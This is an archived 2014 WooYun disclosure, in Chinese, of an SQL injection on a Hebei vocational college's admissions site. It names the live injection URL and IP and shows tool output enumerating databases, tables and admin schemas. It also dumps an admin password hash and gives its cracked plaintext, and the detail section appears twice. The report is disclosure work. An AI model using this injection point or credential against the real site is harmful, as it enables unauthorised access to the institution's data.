当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066046

漏洞标题:河北某大学分站存在sql注射漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 浮萍

提交时间:2014-06-24 15:28

修复时间:2014-06-29 15:28

公开时间:2014-06-29 15:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-24: 细节已通知厂商并且等待厂商处理中
2014-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

河北软件职业技术学院招生信息网存在sql注入

Snap1.jpg


注入点
http://221.192.237.91/zsnew/news.php?id=382

Snap2.jpg


web应用信息

web server operating system: Windows
web application technology: PHP 5.3.5, Apac
back-end DBMS: MySQL 5.0
banner:    '5.1.22-rc-community'
current user:    'root@localhost'
current database:    'shuyuan'
current user is DBA:    True
database management system users [1]:
[*] 'root'@'localhost'


数据库

available databases [6]:
[*] admissions
[*] information_schema
[*] mysql
[*] shuyuan
[*] test
[*] zhaosheng


其中zhaosheng中的表

Database: zhaosheng
[88 tables]
+-----------------------+
| hbsi_addonarticle     |
| hbsi_addonimages      |
| hbsi_addoninfos       |
| hbsi_addonshop        |
| hbsi_addonsoft        |
| hbsi_addonspec        |
| hbsi_admin            |
| hbsi_admintype        |
| hbsi_advancedsearch   |
| hbsi_arcatt           |
| hbsi_arccache         |
| hbsi_archives         |
| hbsi_arcmulti         |
| hbsi_arcrank          |
| hbsi_arctiny          |
| hbsi_arctype          |
| hbsi_area             |
| hbsi_channeltype      |
| hbsi_co_htmls         |
| hbsi_co_mediaurls     |
| hbsi_co_note          |
| hbsi_co_onepage       |
| hbsi_co_urls          |
| hbsi_diyforms         |
| hbsi_dl_log           |
| hbsi_downloads        |
| hbsi_erradd           |
| hbsi_feedback         |
| hbsi_flink            |
| hbsi_flinktype        |
| hbsi_freelist         |
| hbsi_guestbook        |
| hbsi_homepageset      |
| hbsi_keywords         |
| hbsi_log              |
| hbsi_member           |
| hbsi_member_company   |
| hbsi_member_feed      |
| hbsi_member_flink     |
| hbsi_member_friends   |
| hbsi_member_group     |
| hbsi_member_guestbook |
| hbsi_member_model     |
| hbsi_member_msg       |
| hbsi_member_operation |
| hbsi_member_person    |
| hbsi_member_pms       |
| hbsi_member_snsmsg    |
| hbsi_member_space     |
| hbsi_member_stow      |
| hbsi_member_stowtype  |
| hbsi_member_tj        |
| hbsi_member_type      |
| hbsi_member_vhistory  |
| hbsi_moneycard_record |
| hbsi_moneycard_type   |
| hbsi_mtypes           |
| hbsi_multiserv_config |
| hbsi_myad             |
| hbsi_myadtype         |
| hbsi_mytag            |
| hbsi_payment          |
| hbsi_plus             |
| hbsi_purview          |
| hbsi_pwd_tmp          |
| hbsi_ratings          |
| hbsi_scores           |
| hbsi_search_cache     |
| hbsi_search_keywords  |
| hbsi_sgpage           |
| hbsi_shops_delivery   |
| hbsi_shops_orders     |
| hbsi_shops_products   |
| hbsi_shops_userinfo   |
| hbsi_softconfig       |
| hbsi_sphinx           |
| hbsi_stepselect       |
| hbsi_sys_enum         |
| hbsi_sys_module       |
| hbsi_sys_set          |
| hbsi_sys_task         |
| hbsi_sysconfig        |
| hbsi_tagindex         |
| hbsi_taglist          |
| hbsi_uploads          |
| hbsi_verifies         |
| hbsi_vote             |
| hbsi_vote_member      |
+-----------------------+


表zhaosheng中数据

Database: zhaosheng
Table: hbsi_admin
[10 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| email     | char(30)         |
| id        | int(10) unsigned |
| loginip   | varchar(20)      |
| logintime | int(10) unsigned |
| pwd       | char(32)         |
| tname     | char(30)         |
| typeid    | text             |
| uname     | char(20)         |
| userid    | char(30)         |
| usertype  | float unsigned   |
+-----------+------------------+


Database: zhaosheng
Table: hbsi_admin
[1 entry]
+----------------------+---------+-------+
| pwd                  | tname   | uname |
+----------------------+---------+-------+
| 6cedc285ea3b5c2015f0 | <blank> | admin |
+----------------------+---------+-------+


经过解密其密码为hbsi123

Database: shuyuan
[9 tables]
+---------+
| actives |
| admins  |
| baoming |
| columns |
| focimgs |
| hzyx    |
| links   |
| news    |
| notes   |
+---------+


Database: shuyuan
Table: admins
[6 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| grade    | varchar(100) |
| id       | int(11)      |
| instime  | int(11)      |
| lasttime | int(11)      |
| name     | varchar(20)  |
| password | varchar(32)  |
+----------+--------------+

漏洞证明:

河北软件职业技术学院招生信息网存在sql注入

Snap1.jpg


注入点
http://221.192.237.91/zsnew/news.php?id=382

Snap2.jpg


web应用信息

web server operating system: Windows
web application technology: PHP 5.3.5, Apac
back-end DBMS: MySQL 5.0
banner:    '5.1.22-rc-community'
current user:    'root@localhost'
current database:    'shuyuan'
current user is DBA:    True
database management system users [1]:
[*] 'root'@'localhost'


数据库

available databases [6]:
[*] admissions
[*] information_schema
[*] mysql
[*] shuyuan
[*] test
[*] zhaosheng


其中zhaosheng中的表

Database: zhaosheng
[88 tables]
+-----------------------+
| hbsi_addonarticle     |
| hbsi_addonimages      |
| hbsi_addoninfos       |
| hbsi_addonshop        |
| hbsi_addonsoft        |
| hbsi_addonspec        |
| hbsi_admin            |
| hbsi_admintype        |
| hbsi_advancedsearch   |
| hbsi_arcatt           |
| hbsi_arccache         |
| hbsi_archives         |
| hbsi_arcmulti         |
| hbsi_arcrank          |
| hbsi_arctiny          |
| hbsi_arctype          |
| hbsi_area             |
| hbsi_channeltype      |
| hbsi_co_htmls         |
| hbsi_co_mediaurls     |
| hbsi_co_note          |
| hbsi_co_onepage       |
| hbsi_co_urls          |
| hbsi_diyforms         |
| hbsi_dl_log           |
| hbsi_downloads        |
| hbsi_erradd           |
| hbsi_feedback         |
| hbsi_flink            |
| hbsi_flinktype        |
| hbsi_freelist         |
| hbsi_guestbook        |
| hbsi_homepageset      |
| hbsi_keywords         |
| hbsi_log              |
| hbsi_member           |
| hbsi_member_company   |
| hbsi_member_feed      |
| hbsi_member_flink     |
| hbsi_member_friends   |
| hbsi_member_group     |
| hbsi_member_guestbook |
| hbsi_member_model     |
| hbsi_member_msg       |
| hbsi_member_operation |
| hbsi_member_person    |
| hbsi_member_pms       |
| hbsi_member_snsmsg    |
| hbsi_member_space     |
| hbsi_member_stow      |
| hbsi_member_stowtype  |
| hbsi_member_tj        |
| hbsi_member_type      |
| hbsi_member_vhistory  |
| hbsi_moneycard_record |
| hbsi_moneycard_type   |
| hbsi_mtypes           |
| hbsi_multiserv_config |
| hbsi_myad             |
| hbsi_myadtype         |
| hbsi_mytag            |
| hbsi_payment          |
| hbsi_plus             |
| hbsi_purview          |
| hbsi_pwd_tmp          |
| hbsi_ratings          |
| hbsi_scores           |
| hbsi_search_cache     |
| hbsi_search_keywords  |
| hbsi_sgpage           |
| hbsi_shops_delivery   |
| hbsi_shops_orders     |
| hbsi_shops_products   |
| hbsi_shops_userinfo   |
| hbsi_softconfig       |
| hbsi_sphinx           |
| hbsi_stepselect       |
| hbsi_sys_enum         |
| hbsi_sys_module       |
| hbsi_sys_set          |
| hbsi_sys_task         |
| hbsi_sysconfig        |
| hbsi_tagindex         |
| hbsi_taglist          |
| hbsi_uploads          |
| hbsi_verifies         |
| hbsi_vote             |
| hbsi_vote_member      |
+-----------------------+


表zhaosheng中数据

Database: zhaosheng
Table: hbsi_admin
[10 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| email     | char(30)         |
| id        | int(10) unsigned |
| loginip   | varchar(20)      |
| logintime | int(10) unsigned |
| pwd       | char(32)         |
| tname     | char(30)         |
| typeid    | text             |
| uname     | char(20)         |
| userid    | char(30)         |
| usertype  | float unsigned   |
+-----------+------------------+


Database: zhaosheng
Table: hbsi_admin
[1 entry]
+----------------------+---------+-------+
| pwd                  | tname   | uname |
+----------------------+---------+-------+
| 6cedc285ea3b5c2015f0 | <blank> | admin |
+----------------------+---------+-------+


经过解密其密码为hbsi123

Database: shuyuan
[9 tables]
+---------+
| actives |
| admins  |
| baoming |
| columns |
| focimgs |
| hzyx    |
| links   |
| news    |
| notes   |
+---------+


Database: shuyuan
Table: admins
[6 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| grade    | varchar(100) |
| id       | int(11)      |
| instime  | int(11)      |
| lasttime | int(11)      |
| name     | varchar(20)  |
| password | varchar(32)  |
+----------+--------------+

修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-29 15:28

厂商回复:

最新状态:

暂无